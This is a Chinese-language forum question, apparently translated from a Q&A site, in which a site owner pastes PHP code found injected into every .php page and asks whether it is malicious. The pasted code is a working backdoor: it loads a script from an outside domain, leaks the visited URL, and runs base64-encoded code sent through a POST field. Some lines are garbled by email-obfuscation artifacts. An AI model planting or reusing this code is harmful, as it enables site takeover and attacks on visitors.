有人请告知这个PHP代码会做什么?我有PHP只在每个.php页面上找到这个代码,其他页面像js/css/php.ini他们很好..是这个恶意代码?如果是,请建议如何预防它们?这个php脚本会做什么?是恶意的PHP代码?
下面是代码,
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if([email protected]$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
你是如何得到这段代码的?你的PHP文件在你不知情的情况下被修改过 – Ali
嗨阿里,我只是打开FileZila FTP,然后发现每个PHP页面上次修改时间为2011年9月14日上午4时01分14秒(印度时间),然后我打开文件,并找到此代码。它真的很奇怪。 – DBTutor
我的网站也得到了这个文件... – Pinch